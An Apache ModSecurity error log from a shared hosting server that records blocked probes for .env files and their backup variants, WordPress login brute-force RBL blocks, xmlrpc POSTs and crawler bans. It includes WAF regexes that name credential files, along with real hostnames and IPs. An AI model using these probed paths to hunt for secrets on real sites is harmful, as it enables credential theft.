[Tue May 26 16:20:56.528052 2026] [security2:error] [pid 782634:tid 782646] [remote 74.7.241.58:50170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV7EP_P9qBfeb1w76ZpngAAIws"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:20:56.617688 2026] [security2:error] [pid 782634:tid 782765] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7EP_P9qBfeb1w76ZpkgAAAAE"]
[Tue May 26 16:20:57.243994 2026] [http2:info] [pid 795941:tid 795941] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 16:20:58.578731 2026] [security2:error] [pid 795941:tid 796112] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Eu2GQ_TLE_VHIp2C6wAAAK4"]
[Tue May 26 16:20:59.531657 2026] [security2:error] [pid 795941:tid 796175] [client 208.84.100.71:29690] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env"] [unique_id "ahV7E-2GQ_TLE_VHIp2DEwAAAO0"]
[Tue May 26 16:21:00.638162 2026] [security2:error] [pid 795941:tid 796112] [client 208.84.100.71:29444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/api/.env"] [unique_id "ahV7FO2GQ_TLE_VHIp2DRAAAAK4"]
[Tue May 26 16:21:00.640042 2026] [security2:error] [pid 795941:tid 796125] [client 208.84.100.71:29434] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/app/.env"] [unique_id "ahV7FO2GQ_TLE_VHIp2DQwAAALs"]
[Tue May 26 16:21:00.648982 2026] [security2:error] [pid 795941:tid 796114] [client 208.84.100.71:29460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/backend/.env"] [unique_id "ahV7FO2GQ_TLE_VHIp2DQgAAALA"]
[Tue May 26 16:21:01.879893 2026] [security2:error] [pid 795941:tid 796161] [client 14.96.175.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/index.php"] [unique_id "ahV7Fe2GQ_TLE_VHIp2DYAAAAN8"], referer: https://www.xllent.in/contact-us/
[Tue May 26 16:21:01.983757 2026] [security2:error] [pid 795941:tid 796168] [client 14.96.175.102:54607] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/captcha.php/"] [unique_id "ahV7Fe2GQ_TLE_VHIp2DWgAA5gs"], referer: https://www.xllent.in/contact-us/
[Tue May 26 16:21:02.958570 2026] [security2:error] [pid 795941:tid 796189] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Fu2GQ_TLE_VHIp2DbgAAAPs"]
[Tue May 26 16:21:04.501881 2026] [security2:error] [pid 795941:tid 796194] [client 202.76.129.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7GO2GQ_TLE_VHIp2DkgAAAQA"]
[Tue May 26 16:21:04.881791 2026] [security2:error] [pid 795941:tid 796159] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7GO2GQ_TLE_VHIp2DmwAAAN0"]
[Tue May 26 16:21:05.559448 2026] [security2:error] [pid 795941:tid 796078] [client 149.18.117.199:37324] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV7GO2GQ_TLE_VHIp2DowAAAIw"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 16:21:05.778117 2026] [security2:error] [pid 795941:tid 796172] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV7Ge2GQ_TLE_VHIp2DrgAA6nY"]
[Tue May 26 16:21:06.599223 2026] [security2:error] [pid 795941:tid 796119] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Gu2GQ_TLE_VHIp2DuQAAALU"]
[Tue May 26 16:21:06.865827 2026] [security2:error] [pid 795941:tid 796143] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Gu2GQ_TLE_VHIp2DvAAAAM0"]
[Tue May 26 16:21:06.993078 2026] [security2:error] [pid 795941:tid 796176] [client 14.96.175.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "xllent.in"] [uri "/index.php"] [unique_id "ahV7Gu2GQ_TLE_VHIp2DzwAAAO4"]
[Tue May 26 16:21:08.320735 2026] [security2:error] [pid 795941:tid 796085] [client 208.84.100.71:29414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.production.copy"] [unique_id "ahV7HO2GQ_TLE_VHIp2D8gAAAJM"]
[Tue May 26 16:21:08.740211 2026] [security2:error] [pid 795941:tid 796128] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7HO2GQ_TLE_VHIp2D7gAAAL4"]
[Tue May 26 16:21:10.097195 2026] [security2:error] [pid 795941:tid 796177] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7He2GQ_TLE_VHIp2EDwAAAO8"]
[Tue May 26 16:21:10.220308 2026] [security2:error] [pid 795941:tid 796108] [client 208.84.100.71:35518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env~"] [unique_id "ahV7Hu2GQ_TLE_VHIp2EKwAAAKo"]
[Tue May 26 16:21:10.220749 2026] [security2:error] [pid 795941:tid 796138] [client 208.84.100.71:35636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.production~"] [unique_id "ahV7Hu2GQ_TLE_VHIp2EKQAAAMg"]
[Tue May 26 16:21:10.220964 2026] [security2:error] [pid 795941:tid 796084] [client 208.84.100.71:35484] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.old"] [unique_id "ahV7Hu2GQ_TLE_VHIp2ELQAAAJI"]
[Tue May 26 16:21:10.222560 2026] [security2:error] [pid 795941:tid 796108] [client 208.84.100.71:35520] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.swp"] [unique_id "ahV7Hu2GQ_TLE_VHIp2EMQAAAKo"]
[Tue May 26 16:21:10.222729 2026] [security2:error] [pid 795941:tid 796084] [client 208.84.100.71:35442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.orig"] [unique_id "ahV7Hu2GQ_TLE_VHIp2ENAAAAJI"]
[Tue May 26 16:21:10.223541 2026] [security2:error] [pid 795941:tid 796098] [client 208.84.100.71:35524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.copy"] [unique_id "ahV7Hu2GQ_TLE_VHIp2EKgAAAKA"]
[Tue May 26 16:21:10.224926 2026] [security2:error] [pid 795941:tid 796080] [client 208.84.100.71:35482] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.bak"] [unique_id "ahV7Hu2GQ_TLE_VHIp2ENgAAAI4"]
[Tue May 26 16:21:10.225422 2026] [security2:error] [pid 795941:tid 796142] [client 208.84.100.71:35646] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.production.swp"] [unique_id "ahV7Hu2GQ_TLE_VHIp2EKAAAAMw"]
[Tue May 26 16:21:10.226048 2026] [security2:error] [pid 795941:tid 796130] [client 208.84.100.71:35650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.production.orig"] [unique_id "ahV7Hu2GQ_TLE_VHIp2EJwAAAMA"]
[Tue May 26 16:21:10.226275 2026] [security2:error] [pid 795941:tid 796092] [client 208.84.100.71:35498] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.backup"] [unique_id "ahV7Hu2GQ_TLE_VHIp2ELgAAAJo"]
[Tue May 26 16:21:10.227309 2026] [security2:error] [pid 795941:tid 796120] [client 208.84.100.71:35530] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.local.bak"] [unique_id "ahV7Hu2GQ_TLE_VHIp2ENQAAALY"]
[Tue May 26 16:21:10.230055 2026] [security2:error] [pid 795941:tid 796106] [client 208.84.100.71:35624] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.production.backup"] [unique_id "ahV7Hu2GQ_TLE_VHIp2ENwAAAKg"]
[Tue May 26 16:21:10.663238 2026] [security2:error] [pid 795941:tid 796012] [remote 209.42.18.223:35694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahV7Hu2GQ_TLE_VHIp2EOAAAn0Y"]
[Tue May 26 16:21:11.313667 2026] [security2:error] [pid 795941:tid 796109] [client 208.84.100.71:35574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.local~"] [unique_id "ahV7H-2GQ_TLE_VHIp2ERgAAAKs"]
[Tue May 26 16:21:11.313818 2026] [security2:error] [pid 795941:tid 796195] [client 208.84.100.71:35576] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.local.swp"] [unique_id "ahV7H-2GQ_TLE_VHIp2EQgAAAQE"]
[Tue May 26 16:21:11.313899 2026] [security2:error] [pid 795941:tid 796137] [client 208.84.100.71:35578] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.local.orig"] [unique_id "ahV7H-2GQ_TLE_VHIp2ERAAAAMc"]
[Tue May 26 16:21:11.314556 2026] [security2:error] [pid 795941:tid 796190] [client 208.84.100.71:35534] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.local.old"] [unique_id "ahV7H-2GQ_TLE_VHIp2ESgAAAPw"]
[Tue May 26 16:21:11.314652 2026] [security2:error] [pid 795941:tid 796183] [client 208.84.100.71:35550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.local.backup"] [unique_id "ahV7H-2GQ_TLE_VHIp2ETAAAAPU"]
[Tue May 26 16:21:11.315512 2026] [security2:error] [pid 795941:tid 796159] [client 208.84.100.71:35598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.production.bak"] [unique_id "ahV7H-2GQ_TLE_VHIp2ERwAAAN0"]
[Tue May 26 16:21:11.315721 2026] [security2:error] [pid 795941:tid 796096] [client 208.84.100.71:35582] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.local.copy"] [unique_id "ahV7H-2GQ_TLE_VHIp2ESwAAAJ4"]
[Tue May 26 16:21:11.315894 2026] [security2:error] [pid 795941:tid 796188] [client 208.84.100.71:35612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pestcontroldelhi.co.in"] [uri "/.env.production.old"] [unique_id "ahV7H-2GQ_TLE_VHIp2ESAAAAPo"]
[Tue May 26 16:21:11.484886 2026] [security2:error] [pid 795941:tid 796015] [remote 5.42.158.148:35470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV7H-2GQ_TLE_VHIp2ESQAApkk"]
[Tue May 26 16:21:12.701208 2026] [security2:error] [pid 795941:tid 796193] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7IO2GQ_TLE_VHIp2EXgAAAP8"]
[Tue May 26 16:21:14.402153 2026] [autoindex:error] [pid 795941:tid 796064] [remote 216.73.216.82:11572] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:21:15.174349 2026] [security2:error] [pid 795941:tid 796129] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Iu2GQ_TLE_VHIp2ElgAAAL8"]
[Tue May 26 16:21:18.494990 2026] [security2:error] [pid 795941:tid 796073] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7JO2GQ_TLE_VHIp2E1wAAAIc"]
[Tue May 26 16:21:19.847898 2026] [security2:error] [pid 795941:tid 796153] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Ju2GQ_TLE_VHIp2FAgAAANc"]
[Tue May 26 16:21:20.119116 2026] [security2:error] [pid 795941:tid 796133] [client 3.79.134.69:63422] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahV7KO2GQ_TLE_VHIp2FKwAAAMM"], referer: https://thegoodsporting.com
[Tue May 26 16:21:21.454942 2026] [security2:error] [pid 795941:tid 796175] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7KO2GQ_TLE_VHIp2FMQAAAO0"]
[Tue May 26 16:21:23.071342 2026] [security2:error] [pid 795941:tid 796100] [client 216.73.216.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahV7Ku2GQ_TLE_VHIp2FSAAAAKI"]
[Tue May 26 16:21:24.568189 2026] [security2:error] [pid 795941:tid 796092] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7K-2GQ_TLE_VHIp2FaQAAAJo"]
[Tue May 26 16:21:24.954849 2026] [security2:error] [pid 795941:tid 796146] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7K-2GQ_TLE_VHIp2FbwAAANA"]
[Tue May 26 16:21:26.411258 2026] [security2:error] [pid 795941:tid 796131] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7Le2GQ_TLE_VHIp2FmgAAAME"]
[Tue May 26 16:21:26.562355 2026] [security2:error] [pid 795941:tid 796115] [client 85.208.96.203:14120] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahV7Lu2GQ_TLE_VHIp2FzgAAALE"]
[Tue May 26 16:21:26.562512 2026] [security2:error] [pid 795941:tid 796115] [client 85.208.96.203:14120] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahV7Lu2GQ_TLE_VHIp2FzgAAALE"]
